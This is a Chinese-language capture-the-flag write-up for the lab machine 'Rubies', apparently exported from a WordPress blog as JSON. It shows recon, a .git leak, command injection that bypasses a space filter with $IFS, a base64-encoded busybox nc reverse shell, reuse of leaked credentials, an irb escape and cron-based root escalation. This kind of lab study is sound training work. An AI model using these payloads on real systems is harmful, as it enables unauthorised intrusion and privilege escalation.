{"id":919,"date":"2025-06-27T17:50:36","date_gmt":"2025-06-27T09:50:36","guid":{"rendered":"http:\/\/162.14.82.114\/?p=919"},"modified":"2025-06-27T17:50:36","modified_gmt":"2025-06-27T09:50:36","slug":"hmv-_-rubies","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/919\/06\/27\/2025\/","title":{"rendered":"hmv[-_-]Rubies"},"content":{"rendered":"

Rubies<\/h1>\n

\"image-20250626073616287\"<\/div>
\n
\"image-20250627151053425\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nRustScan: Where '404 Not Found' meets '200 OK'.\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.103:22\nOpen 192.168.10.103:80\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 54:65:0b:7a:f3:5c:2f:1f:14:9e:bb:0e:44:0c:af:29 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDE\/Zle5m4f4AGy9YmUIpH6oPtsediZ0nAqU5w+BLYnsfPGLCSkERzCNIuFFPXiG6Tls5RGxqXQG8tlkzw8nMfO84M5AOVpU9zW0PfTBVMstIP35GFB7FM9poUJbaZuUSphSaXI1mCnDbfqqeKdXG6dPgcs9WZ8V8r5ztVlX81C+egicGtYP1pnBipD+9QTiC+VAHWmXwl1DlM5NR0QCwQEL6L2beTpIYYQPoRAVtdUm69gTj2Rz68NRJMb9U2wh0EBoRc\/Ays3NfLPCgl5yE9hG7zFxnVhaeYQ2aToKLwi73tkcmiVzw50WhTq5DBYpAVvZILsUsUdWf7ZiS4ijq1D\n|   256 1f:5d:63:05:65:f7:cf:70:e4:0d:0a:45:80:77:50:2c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOUx6vIyCY6Gf5m3Qajt1hPCSUqKtpH2ClgfwOPv5qWmhY9DAlK1xM74+rUAjJzvV5tQp2MPFjtWVSgR7cqCXLw=\n|   256 69:a2:0f:83:dc:19:f2:c1:72:9c:a3:f8:09:44:3e:36 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIObby0VuUYMXXpCjGp864yN\/OSdnUWEPSmGciy2N1ksg\n80\/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Cute Cat Only\n| http-git: \n|   192.168.10.103:80\/.git\/\n|     Git repository found!\n|     Repository description: Unnamed repository; edit this file 'description' to name the...\n|_    Last commit message: Why minnie? \n|_http-server-header: Apache\/2.4.18 (Ubuntu)\nMAC Address: 08:00:27:F5:50:F5 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,zip\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.103\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,html,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\n\/index.php            (Status: 200) [Size: 742]\n\/uploads              (Status: 301) [Size: 318] [--> http:\/\/192.168.10.103\/uploads\/]\n\/bg                   (Status: 301) [Size: 313] [--> http:\/\/192.168.10.103\/bg\/]\n\/javascript           (Status: 301) [Size: 321] [--> http:\/\/192.168.10.103\/javascript\/]\n\/poems                (Status: 301) [Size: 316] [--> http:\/\/192.168.10.103\/poems\/]\n\/.php                 (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\n\/server-status        (Status: 403) [Size: 279]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
git\u6cc4\u9732<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies]\n\u2514\u2500$ GitHack.py -u http:\/\/$IP\/.git\n[+] Download and parse index file ...\n[+] bg\/bg.gif\n[+] index.php\n[+] poems\/poem1\n[+] poems\/poem2\n[+] poems\/poem3\n[+] poems\/poem4\n[+] poems\/poem5\n[+] uploads\/cat1.gif\n[+] uploads\/cat2.jpg\n[OK] index.php\n[OK] poems\/poem4\n[OK] poems\/poem5\n[OK] poems\/poem3\n[OK] uploads\/cat2.jpg\n[OK] poems\/poem1\n[OK] poems\/poem2\n[OK] bg\/bg.gif\n[OK] uploads\/cat1.gif\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies]\n\u2514\u2500$ tree .\/  \n.\/\n\u251c\u2500\u2500 192.168.10.103\n\u2502   \u251c\u2500\u2500 bg\n\u2502   \u2502   \u2514\u2500\u2500 bg.gif\n\u2502   \u251c\u2500\u2500 index.php\n\u2502   \u251c\u2500\u2500 poems\n\u2502   \u2502   \u251c\u2500\u2500 poem1\n\u2502   \u2502   \u251c\u2500\u2500 poem2\n\u2502   \u2502   \u251c\u2500\u2500 poem3\n\u2502   \u2502   \u251c\u2500\u2500 poem4\n\u2502   \u2502   \u2514\u2500\u2500 poem5\n\u2502   \u2514\u2500\u2500 uploads\n\u2502       \u251c\u2500\u2500 cat1.gif\n\u2502       \u2514\u2500\u2500 cat2.jpg\n\u2514\u2500\u2500 index\n\n5 directories, 10 files<\/code><\/pre>\n
\u770b\u4e86\u4e00\u4e0bindex.php<\/code>\u53d1\u73b0\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies]\n\u2514\u2500$ cat 192.168.10.103\/index.php\n<?php\n\nif(isset($_GET['poem'])){\n        $input = $_GET['poem'];\n        if (strpos($input, ' ')){\n                $output = "Rce detected";\n        }else{\n                $output = shell_exec("cat poems\/".$input);\n        }\n}\n?>\n\n<html>\n<head>\n        <title>Cute Cat Only<\/title>\n        <style>\n        body{\n                font-family: "Arial";\n                text-align: center;\n                background-image:url("bg\/bg.gif");\n        }\n        .cute-img{\n                width: 200px;\n                height: 200px;\n                border: white 4px solid;\n        }\n        <\/style>\n<\/head>\n<body>\n        <h2>Cute Cat ONLY!<\/h2>\n        <!-- Upload functionality is currently disabled because Minnie messed up the code, lemme provide you with cute poems for the time being -->\n        <form method="get" action="">\n                <input type="file" name="picture" disabled><\/input>\n                <input type="submit" disabled><\/input><br><br><br>\n        <\/form>\n        <a href="index.php?poem=poem<?php echo rand(1,5)?>">Next<\/a>\n        <br><br>\n        <pre>\n                <?php echo $output ?>\n        <\/pre>\n        <img class="cute-img" src="uploads\/cat1.gif"\/>\n        <img class="cute-img" src="uploads\/cat2.jpg" \/>\n<\/body>\n\n<\/html><\/code><\/pre>\n
\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
\"image-20250627154003998\"<\/div><\/p>\n
\u6ce8\u610f\u5230\u6e90\u4ee3\u7801\u4e2d\u5b58\u5728\u76f8\u5173\u53c2\u6570\uff0c\u770b\u4e0b\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
http:\/\/192.168.10.103\/?poem=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n
\"image-20250627154059838\"<\/div><\/p>\n
\u6ce8\u610f\u5230\u6e90\u4ee3\u7801\u4e2d\uff1a<\/p>\n
index.php?poem=poem<?php echo rand(1,5)?><\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u4e0a\u4f20\uff0c\u4f46\u662f\u53d1\u73b0\u7981\u7528\u4e0a\u4f20\u4e86\uff0c\u6e90\u4ee3\u7801\u89e3\u91ca\u4e86\uff1a<\/p>\n
<!-- Upload functionality is currently disabled because Minnie messed up the code, lemme provide you with cute poems for the time being --><\/code><\/pre>\n
\u70b9\u51fbNext<\/code>\uff1a<\/p>\n
\"image-20250627154325953\"<\/div><\/p>\n
\u5c1d\u8bd5\u4fee\u6539\u6570\u5b57\u770b\u770b\u6709\u6ca1\u6709\u5176\u4ed6\u9875\u9762\uff1a<\/p>\n
# http:\/\/192.168.10.103\/index.php?poem=poem1\n        a baa black sheep\nHave you any wool\nEnough for each sheep\nOwner to call\nThe people who do knitting and stuff\nEveryone wants the sheep to look rough\nMoo moo brown cow\nHave you any milk\nYes sir yes sir\nAs pure as silk\nYou see I want my genetals\nTo bring a lot of milk\nFor the supermarket\nMeow meow tabby cat\nHave you got our cuddle\nVery close like a famous huddle\nGo meow when a burglar comes scares him away that famous cat\nMeow meow tabby cat\nGood on you\n\n-----------------------\n# http:\/\/192.168.10.103\/index.php?poem=poem5\n    Meow!\nMeow!\nMeow!\nMeow!\nMeow!\nMeow!\nMeow!\nMeow!\nMeow!\nMeow!\nMeow!\u00ad\nMeow!\nMeow!\nMeow!\nMeow!\nMeow!\nMeow!\nMeow!\nMeow!\nMeow!\nMeow!\nMeow\u00ad!\nMeow!\nMeow!<\/code><\/pre>\n
\u5c1d\u8bd5\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n
# http:\/\/192.168.10.103\/index.php?poem=poem5<?php phpinfo(); ?>\nRce detected\n\n# \u5c1d\u8bd5\u8fdb\u884c\u7ed5\u8fc7\n<?php\n\nif(isset($_GET['poem'])){\n        $input = $_GET['poem'];\n        if (strpos($input, ' ')){\n                $output = "Rce detected";           # \u4e0d\u80fd\u5b58\u5728\u7a7a\u683c\uff01\uff01\uff01\n        }else{\n                $output = shell_exec("cat poems\/".$input);\n        }\n}\n?>\n\n# \u62fc\u63a5\u547d\u4ee4\u8fdb\u884c\u7ed5\u8fc7\n# http:\/\/192.168.10.103\/index.php?poem=poem5;whoami;id;pwd;ls\nMeow!\nMeow!\nMeow!\nMeow!\nMeow\u00ad!\nMeow!\nMeow!\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\/var\/www\/html\nbg\nindex.php\npoems\nuploads<\/code><\/pre>\n
\u5fc5\u987b\u5f97\u5c1d\u8bd5\u4e0d\u7528\u7a7a\u683c\u53cd\u5f39shell\uff01\uff01\uff01\uff01<\/p>\n
\u7ed5\u8fc7\u7a7a\u683c\u53cd\u5f39shell<\/h3>\n
\n
\u53c2\u8003\uff1ahttps:\/\/fushuling.com\/index.php\/2023\/03\/04\/%E5%88%A9%E7%94%A8shell%E8%84%9A%E6%9C%AC%E5%8F%98%E9%87%8F%E6%9E%84%E9%80%A0%E6%97%A0%E5%AD%97%E6%AF%8D%E6%95%B0%E5%AD%97%E5%91%BD%E4%BB%A4\/<\/a><\/p>\n
https:\/\/blog.csdn.net\/angaoux03775\/article\/details\/101710776<\/a><\/p>\n
https:\/\/blog.csdn.net\/2301_79518550\/article\/details\/147002198<\/a><\/p>\n<\/blockquote>\n
\u89e3\u6cd5\uff1a$IFS<\/h4>\n
\u4f7f\u7528$IFS \u6216 ${IFS}<\/code> \u66ff\u6362\u7a7a\u683c\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.103\/index.php?poem=poem5" > log1                                      \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.103\/index.php?poem=poem5;whoami;id;pwd;ls" > log2; diff log1 log2           \n25c25\n<       <a href="index.php?poem=poem2">Next<\/a>\n---\n>       <a href="index.php?poem=poem1">Next<\/a>\n51a52,58\n> www-data\n> uid=33(www-data) gid=33(www-data) groups=33(www-data)\n> \/var\/www\/html\n> bg\n> index.php\n> poems\n> uploads\n\n# curl -s 'http:\/\/192.168.10.103\/index.php?poem=poem5;ls${IFS}-la' > log2; diff log1 log2\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies]\n\u2514\u2500$ curl -s 'http:\/\/192.168.10.103\/index.php?poem=poem5;ls$IFS-la' > log2; diff log1 log2\n25c25\n<       <a href="index.php?poem=poem2">Next<\/a>\n---\n>       <a href="index.php?poem=poem5">Next<\/a>\n51a52,59\n> total 28\n> drwxrwxr-x 6 root www-data 4096 Nov  3  2020 .\n> drwxr-xr-x 3 root root     4096 Nov  2  2020 ..\n> drwxr-xr-x 8 root root     4096 Nov  2  2020 .git\n> drwxr-xr-x 2 root www-data 4096 Nov  2  2020 bg\n> -rw-r--r-- 1 root www-data  960 Nov  2  2020 index.php\n> drwxr-xr-x 2 root www-data 4096 Nov  2  2020 poems\n> drwxr-xr-x 2 root www-data 4096 Nov  2  2020 uploads<\/code><\/pre>\n
\u6210\u529f\u6267\u884c\uff01<\/p>\n
\u89e3\u6cd5\u4e8c\uff1a\u5931\u8d25<\/h4>\n
\u82b1\u62ec\u53f7 {}<\/code> \u662f Shell \u7684\u6269\u5c55\u8bed\u6cd5\uff0c\u7528\u4e8e\u751f\u6210\u591a\u4e2a\u5b57\u7b26\u4e32\u7ec4\u5408\u3002<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies]\n\u2514\u2500$ {ls,-la}                                                 \nls,-la: command not found\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies]\n\u2514\u2500$ echo $SHELL                                              \n\/usr\/bin\/zsh\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies]\n\u2514\u2500$ bash\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies]\n\u2514\u2500$ {ls,-la}\ntotal 28\ndrwxrwxr-x  3 kali kali 4096 Jun 27 04:09 .\ndrwxrwxr-x 39 kali kali 4096 Jun 27 03:10 ..\ndrwxrwxr-x  5 kali kali 4096 Jun 27 03:32 192.168.10.103\n-rw-rw-r--  1 kali kali  858 Jun 27 03:32 index\n-rw-rw-r--  1 kali kali  295 Jun 27 04:06 log\n-rw-rw-r--  1 kali kali  890 Jun 27 04:09 log1\n-rw-rw-r--  1 kali kali  890 Jun 27 04:16 log2<\/code><\/pre>\n
PS:ZSH\u4f3c\u4e4e\u4e0d\u652f\u6301\u8be5\u6027\u8d28\uff0c\u8981\u5207\u6362\u4e3abash\u624d\u80fd\u7528\uff01<\/strong><\/p>\n
\u6211\u8fd9\u91cc\u6253\u9776\u673a\u4f3c\u4e4e\u6ca1\u6709\u6210\u529f\uff0c\u53ef\u80fd\u662fsh\uff1f\u3002\u3002\u3002\u3002<\/p>\n
\u8fd8\u6709\u5f88\u591a\u529e\u6cd5\uff0c\u8fd9\u91cc\u6211\u6ca1\u5c1d\u8bd5\u6210\u529f\u3002\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies]\n\u2514\u2500$ CMD=$'\\x20\/etc\/passwd'&&cat$CMD\nroot:x:0:0:root:\/root:\/usr\/bin\/zsh\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\n----------------------<\/code><\/pre>\n
\u8fd8\u53ef\u4ee5\u7528\u7f16\u7801\u8fdb\u884c\u7ed5\u8fc7\uff0c\u4f46\u662f\u89e3\u7801\u8fd8\u662f\u8981\u7a7a\u683c\u3002\u3002\u3002\u3002<\/p>\n
\u53cd\u5f39shell<\/h4>\n
busybox nc 192.168.10.107 1234 -e bash\nYnVzeWJveCBuYyAxOTIuMTY4LjEwLjEwNyAxMjM0IC1lIGJhc2g=\n\necho$IFS'YnVzeWJveCBuYyAxOTIuMTY4LjEwLjEwNyAxMjM0IC1lIGJhc2g='|base64$IFS-d|bash\necho%24IFS%27YnVzeWJveCBuYyAxOTIuMTY4LjEwLjEwNyAxMjM0IC1lIGJhc2g%3D%27%7Cbase64%24IFS%2Dd%7Cbash<\/code><\/pre>\n
\"image-20250627170349626\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@rubies:\/tmp$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nsshd\n(remote) www-data@rubies:\/tmp$ ls -la \/home\/\ntotal 12\ndrwxr-xr-x  3 root root 4096 Nov  2  2020 .\ndrwxr-xr-x 23 root root 4096 Nov  2  2020 ..\ndrwxr-xr-x  2 root root 4096 Nov  2  2020 minnie\n(remote) www-data@rubies:\/tmp$ id minnie\nuid=1001(minnie) gid=1001(minnie) groups=1001(minnie)\n(remote) www-data@rubies:\/tmp$ cat \/etc\/passwd | grep minnie\nminnie:x:1001:1001::\/home\/minnie\/:\/usr\/bin\/irb\n(remote) www-data@rubies:\/tmp$ sudo -l\n[sudo] password for www-data:<\/code><\/pre>\n
\u8fd9\u5565\u73a9\u610f\u554a\u3002\u3002\u3002<\/p>\n
\n
IRB\uff08Interactive Ruby\uff09<\/strong> \u662f Ruby \u7f16\u7a0b\u8bed\u8a00\u7684\u4ea4\u4e92\u5f0f\u89e3\u91ca\u5668\uff0c\u529f\u80fd\u7c7b\u4f3c\u4e8e Python \u7684 IDLE \u6216 Node.js \u7684 REPL<\/p>\n<\/blockquote>\n
git\u6cc4\u9732\u5bc6\u7801\u590d\u7528<\/h3>\n
\u5c1d\u8bd5\u770b\u4e00\u4e0b\u524d\u9762\u7684git\u6cc4\u9732\uff1a<\/p>\n
(remote) www-data@rubies:\/var\/www\/html$ git log\ncommit 052a0cb4865e29bc03278105e0232b20173f933d\nAuthor: Your Name <root@rubies.com>\nDate:   Mon Nov 2 14:27:16 2020 +0800\n\n    Why minnie?\n\ncommit 07b8a39fdce5ed957f2d1c4561b93e21af2fb3a8\nAuthor: Your Name <root@rubies.com>\nDate:   Mon Nov 2 14:25:50 2020 +0800\n\n    first commit\n(remote) www-data@rubies:\/var\/www\/html$ git diff 052a0cb4865e29bc03278105e0232b20173f933d\n(remote) www-data@rubies:\/var\/www\/html$ git diff 07b8a39fdce5ed957f2d1c4561b93e21af2fb3a8\ndiff --git a\/index.php b\/index.php\nindex 41f0f2f..d33ca0d 100644\n--- a\/index.php\n+++ b\/index.php\n@@ -8,33 +8,6 @@ if(isset($_GET['poem'])){\n                $output = shell_exec("cat poems\/".$input);\n        }\n }\n-\n-\n-\/\/ we dont need a login page dangit minnie! follow my orders pls\n-$servername = "localhost";\n-$username = "root";\n-$password = "jd92khn49w";\n-\n-$conn = new mysqli($servername, $username, $password);\n-\n-if ($conn->connect_error) {\n-  die("Connection failed: " . $conn->connect_error);\n-}\n-\n-$login_username=$_POST['username'];\n-$login_password=$_POST['password'];\n-\n-$sql = "SELECT * FROM users WHERE Username = '$login_username' AND Password = '$login_password' ";\n-$result = mysqli_query($con,$sql);\n-\n-if(sqmli_num_rows($result)<1){i\n-       $_SESSION['login']=$user_id;\n-       header('Location: http:\/\/ch4rm.pw\/dashboard');\n-}\n-else{\n-       $error = True;\n-}\n-\n ?>\n\n <html><\/code><\/pre>\n
\u6709\u4e00\u4e2a\u5bc6\u7801\uff0c\u5c1d\u8bd5\u5207\u6362 root\uff0c\u4f46\u662f\u5931\u8d25\uff0c\u5207\u6362\u552f\u4e00\u90a3\u4e2a\u7528\u6237\u53d1\u73b0\u6210\u529f\u4e86\uff01<\/p>\n
\"image-20250627173151814\"<\/div><\/p>\n
\u63d0\u6743root<\/h3>\n
\u5c1d\u8bd5\u6267\u884c\u547d\u4ee4\uff0c\u4f46\u662f\u5e38\u89c1\u7684\u90fd\u7528\u4e0d\u4e86\uff1a<\/p>\n
irb(main):001:0> ls -la\nNameError: undefined local variable or method `la' for main:Object\n        from (irb):1\n        from \/usr\/bin\/irb:11:in `<main>'\nirb(main):002:0> whoami\nNameError: undefined local variable or method `whoami' for main:Object\n        from (irb):2\n        from \/usr\/bin\/irb:11:in `<main>'\nirb(main):003:0> bash\nNameError: undefined local variable or method `bash' for main:Object\n        from (irb):3\n        from \/usr\/bin\/irb:11:in `<main>'<\/code><\/pre>\n
\u8054\u60f3\u5230\u662f ruby \u7684 shell\uff0c\u770b\u4e0b\u6587\u6863\uff1a<\/p>\n
irb(main):004:0> puts "Hello world!"\nHello world!\n=> nil<\/code><\/pre>\n
\u7ed3\u5408:https:\/\/gtfobins.github.io\/gtfobins\/irb\/<\/a><\/p>\n
\"image-20250627173602465\"<\/div><\/p>\n
minnie@rubies:\/home\/minnie$ ls -la\ntotal 24\ndrwxr-xr-x 2 root root   4096 Nov  2  2020 .\ndrwxr-xr-x 3 root root   4096 Nov  2  2020 ..\n-rw-r--r-- 1 root root   3884 Nov  2  2020 .bashrc\n-rw-r--r-- 1 root root     67 Nov  2  2020 note.txt\n-rw-r--r-- 1 root root    807 Nov  2  2020 .profile\n-rw-r----- 1 root minnie   21 Nov  2  2020 user.txt\nminnie@rubies:\/home\/minnie$ cat *.txt\nPut anything you'd like to in the folder,\ndo not do dumb stuff pls\nH0wc00l_i5_Byp@@s1n9\nminnie@rubies:\/home\/minnie$ sudo -l\n[sudo] password for minnie: \nSorry, user minnie may not run sudo on rubies.<\/code><\/pre>\n
\u7136\u540e\u627e\u5230\u4e86\uff1a<\/p>\n
minnie@rubies:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root   4096 Nov  2  2020 .\ndrwxr-xr-x 23 root root   4096 Nov  2  2020 ..\ndrwxrwxr-x  2 root minnie 4096 Nov  2  2020 cleaning\nminnie@rubies:\/opt$ cd cleaning\/\nminnie@rubies:\/opt\/cleaning$ ls -la\ntotal 12\ndrwxrwxr-x 2 root minnie 4096 Nov  2  2020 .\ndrwxr-xr-x 3 root root   4096 Nov  2  2020 ..\n-rw-r--r-- 1 root root    108 Nov  2  2020 webserver_upload.rb\nminnie@rubies:\/opt\/cleaning$ cat webserver_upload.rb \nrequire "find"\n\nFind.find("\/var\/www\/html\/uploads\/") do |file|\n  File.delete("#{file}") if file=~\/\\.php\/\nend<\/code><\/pre>\n
\u5220\u9664\u4e86\u7f51\u7ad9\u4e0a\u4f20\u76ee\u5f55\u4e0b\u6240\u6709\u7684.php<\/code>\uff0c\u8bf4\u660e\u80af\u5b9a\u662f\u5b9a\u65f6\u4efb\u52a1\u6216\u8005\u662f\u5f00\u673a\u4efb\u52a1\uff0c\u4e0a\u4f20pspy64<\/code>:<\/p>\n
2025\/06\/27 17:40:45 CMD: UID=0     PID=5      | \n2025\/06\/27 17:40:45 CMD: UID=0     PID=3      | \n2025\/06\/27 17:40:45 CMD: UID=0     PID=2      | \n2025\/06\/27 17:40:45 CMD: UID=0     PID=1      | \/sbin\/init \n2025\/06\/27 17:41:01 CMD: UID=0     PID=3074   | \/usr\/bin\/ruby \/root\/bundle.rb \n2025\/06\/27 17:41:01 CMD: UID=0     PID=3073   | \/bin\/sh -c \/usr\/bin\/ruby \/root\/bundle.rb \n2025\/06\/27 17:41:01 CMD: UID=0     PID=3072   | \/usr\/sbin\/CRON -f \n2025\/06\/27 17:41:01 CMD: UID=0     PID=3076   | \/usr\/bin\/ruby \/root\/bundle.rb \n2025\/06\/27 17:42:01 CMD: UID=0     PID=3080   | \/usr\/bin\/ruby \/root\/bundle.rb \n2025\/06\/27 17:42:01 CMD: UID=0     PID=3079   | \/bin\/sh -c \/usr\/bin\/ruby \/root\/bundle.rb \n2025\/06\/27 17:42:01 CMD: UID=0     PID=3078   | \/usr\/sbin\/CRON -f \n2025\/06\/27 17:42:01 CMD: UID=0     PID=3082   | \/usr\/bin\/ruby \/root\/bundle.rb <\/code><\/pre>\n
\u8fd9\u91cc\u731c\u6d4bbundle.rb <\/code>\u662f\u6267\u884c\/opt\/cleaning<\/code>\u4e0b\u7684\u811a\u672c\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
minnie@rubies:\/opt\/cleaning$ ls -la\ntotal 12\ndrwxrwxr-x 2 root minnie 4096 Nov  2  2020 .\ndrwxr-xr-x 3 root root   4096 Nov  2  2020 ..\n-rw-r--r-- 1 root root    108 Nov  2  2020 webserver_upload.rb\nminnie@rubies:\/opt\/cleaning$ echo 'exec "chmod +s \/bin\/bash"' > temp.rb\nminnie@rubies:\/opt\/cleaning$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1037528 Jul 13  2019 \/bin\/bash\nminnie@rubies:\/opt\/cleaning$ cat temp.rb \nexec "chmod +s \/bin\/bash"\nminnie@rubies:\/opt\/cleaning$ ls -la \/bin\/bash\n-rwsr-sr-x 1 root root 1037528 Jul 13  2019 \/bin\/bash<\/code><\/pre>\n
\u63d0\u6743\u6210\u529f\uff01<\/p>\n
minnie@rubies:\/root# ls -la\ntotal 48\ndrwx------  3 root root 4096 Nov  2  2020 .\ndrwxr-xr-x 23 root root 4096 Nov  2  2020 ..\n-rw-------  1 root root   61 Nov  3  2020 .bash_history\n-rw-r--r--  1 root root 3106 Oct 23  2015 .bashrc\n-rw-r--r--  1 root root  217 Nov  2  2020 bundle.rb\n-rw-r--r--  1 root root   50 Nov  2  2020 .gitconfig\ndrwxr-xr-x  2 root root 4096 Nov  3  2020 .nano\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-------  1 root root   15 Nov  2  2020 \u200broot.txt\n-rw-r--r--  1 root root   66 Nov  2  2020 .selected_editor\n-rw-------  1 root root 6464 Nov  2  2020 .viminfo\nminnie@rubies:\/root# cat .bash_history\n\ncd\necho > .bash_history \nexit\nexit\nsu minnie\nexit\nexit\nminnie@rubies:\/root# cat bundle.rb\n#!\/usr\/bin\/ruby\n\nDir.foreach("\/opt\/cleaning\/") do |rb_filename|\n        system("ruby \/opt\/cleaning\/#{rb_filename}") if rb_filename=~\/\\.rb\/ \nend\n\n#hint for flag if you'd love to try\n#http:\/\/www.unicode-symbol.com\/u\/200B.html\nminnie@rubies:\/root# cat 2020 \u200broot.txt\ncat: 2020: No such file or directory\npyth0N>r00bi35\nminnie@rubies:\/root# ls\nbundle.rb  \u200broot.txt\nminnie@rubies:\/root# cat root.txt\ncat: root.txt: No such file or directory\nminnie@rubies:\/root# cat *.txt\npyth0N>r00bi35<\/code><\/pre>\n
\u5f88\u90aa\u95e8\uff0c\u5c45\u7136\u590d\u5236\u7c98\u8d34\u51fa\u6765\u7684\u4e0d\u592a\u4e00\u6837\u3002\u3002\u3002\u3002\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
Rubies \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Rubies] \u2514\u2500$ rus […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-919","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/919","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=919"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/919\/revisions"}],"predecessor-version":[{"id":920,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/919\/revisions\/920"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=919"}],"wp:term":[{"taxonomy":"category","embeddable